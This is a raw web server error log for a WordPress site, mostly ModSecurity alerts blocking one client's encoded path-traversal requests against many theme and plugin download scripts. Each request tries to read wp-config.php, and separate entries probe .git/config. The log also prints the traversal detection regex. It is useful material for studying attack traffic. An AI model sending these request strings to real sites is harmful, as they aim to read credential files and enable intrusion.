[hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZETBV5iuaoNVgUVrFgxqhAAAANQ"] [Sun Apr 23 01:36:00.420746 2023] [autoindex:error] [pid 15953:tid 140483355444992] [client 51.142.103.94:39484] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 23 06:10:30.335874 2023] [autoindex:error] [pid 31043:tid 140217236883200] [client 49.51.199.181:52164] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/04/23 09:20:13 [error] 30906#30906: *20201 access forbidden by rule, client: 35.86.230.147, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/04/23 09:42:20 [error] 30906#30906: *21125 access forbidden by rule, client: 35.86.230.147, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Apr 24 14:35:01.980535 2023] [autoindex:error] [pid 23008:tid 140094275036928] [client 89.33.44.247:45304] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 25 04:33:45.402750 2023] [:error] [pid 15889:tid 140447083120384] [client 37.120.213.169:41270] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/down.php"] [unique_id "ZEeeeV4G6tVEc6w5Us7gYgAAAMk"] [Tue Apr 25 04:33:45.536415 2023] [:error] [pid 15889:tid 140446990800640] [client 37.120.213.169:41272] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id "ZEeeeV4G6tVEc6w5Us7gYwAAANQ"] [Tue Apr 25 04:33:45.661510 2023] [:error] [pid 15889:tid 140447099905792] [client 37.120.213.169:41274] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download/download.php"] [unique_id "ZEeeeV4G6tVEc6w5Us7gZAAAAMc"] [Tue Apr 25 04:33:45.786621 2023] [:error] [pid 15889:tid 140446957229824] [client 37.120.213.169:41276] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/inc/download.php"] [unique_id "ZEeeeV4G6tVEc6w5Us7gZQAAANg"] [Tue Apr 25 04:33:45.911830 2023] [:error] [pid 15889:tid 140446974015232] [client 37.120.213.169:41278] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/view-pdf.php"] [unique_id "ZEeeeV4G6tVEc6w5Us7gZgAAANY"] [Tue Apr 25 04:33:46.038723 2023] [:error] [pid 15889:tid 140447219951360] [client 37.120.213.169:41280] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/scripts/download.php"] [unique_id "ZEeeel4G6tVEc6w5Us7gZwAAAME"] [Tue Apr 25 04:33:46.166422 2023] [:error] [pid 15889:tid 140446965622528] [client 37.120.213.169:41282] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/includes/download.php"] [unique_id "ZEeeel4G6tVEc6w5Us7gaAAAANc"] [Tue Apr 25 04:33:46.291731 2023] [:error] [pid 15580:tid 140447032764160] [client 37.120.213.169:41284] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/lib/downloadlink.php"] [unique_id "ZEeeet-GjcOLRjW9Sa4V_AAAAI8"] [Tue Apr 25 04:33:46.417179 2023] [:error] [pid 15579:tid 140447083120384] [client 37.120.213.169:41286] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/functions/download.php"] [unique_id "ZEeeeiIlOCjnXl5KlpegWgAAAEk"] [Tue Apr 25 04:33:46.546494 2023] [:error] [pid 15579:tid 140447049549568] [client 37.120.213.169:41288] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/download.php"] [unique_id "ZEeeeiIlOCjnXl5KlpegWwAAAE0"] [Tue Apr 25 04:33:46.684768 2023] [:error] [pid 15579:tid 140447091513088] [client 37.120.213.169:41290] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/css/css.php"] [unique_id "ZEeeeiIlOCjnXl5KlpegXAAAAEg"] [Tue Apr 25 04:33:46.810877 2023] [:error] [pid 15580:tid 140447228344064] [client 37.120.213.169:41294] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/zerif-lite/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/framework/utilities/download/getfile.php"] [unique_id "ZEeeet-GjcOLRjW9Sa4V_QAAAIA"] [Tue Apr 25 04:34:02.292378 2023] [:error] [pid 15579:tid 140447083120384] [client 37.120.213.169:41394] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive.php"] [unique_id "ZEeeiiIlOCjnXl5KlpegZwAAAEk"] [Tue Apr 25 04:34:02.418700 2023] [:error] [pid 15579:tid 140447049549568] [client 37.120.213.169:41398] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Predicate.php"] [unique_id "ZEeeiiIlOCjnXl5KlpegaAAAAE0"] [Tue Apr 25 04:34:02.546091 2023] [:error] [pid 15579:tid 140447091513088] [client 37.120.213.169:41400] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Reader.php"] [unique_id "ZEeeiiIlOCjnXl5KlpegaQAAAEg"] [Tue Apr 25 04:34:02.676934 2023] [:error] [pid 15579:tid 140447194773248] [client 37.120.213.169:41402] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Writer.php"] [unique_id "ZEeeiiIlOCjnXl5KlpegagAAAEQ"] [Tue Apr 25 04:34:02.810151 2023] [:error] [pid 15889:tid 140447032764160] [client 37.120.213.169:41406] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Enigma2.php?boarddir=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Enigma2.php"] [unique_id "ZEeeil4G6tVEc6w5Us7gdQAAAM8"] [Tue Apr 25 04:34:02.943927 2023] [:error] [pid 15578:tid 140447066334976] [client 37.120.213.169:41408] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/abtest/abtest_admin.php?action=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/abtest/abtest_admin.php"] [unique_id "ZEeeij754oNYNW-15_AYYQAAAAs"] [Tue Apr 25 04:34:03.069789 2023] [:error] [pid 15580:tid 140447024371456] [client 37.120.213.169:41412] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-custom-fields/core/actions/export.php"] [unique_id "ZEeei9-GjcOLRjW9Sa4WBQAAAJA"] [Tue Apr 25 04:34:03.203967 2023] [:error] [pid 15580:tid 140447211558656] [client 37.120.213.169:41414] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZEeei9-GjcOLRjW9Sa4WBgAAAII"] [Tue Apr 25 04:34:03.336995 2023] [:error] [pid 15578:tid 140447083120384] [client 37.120.213.169:41416] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: 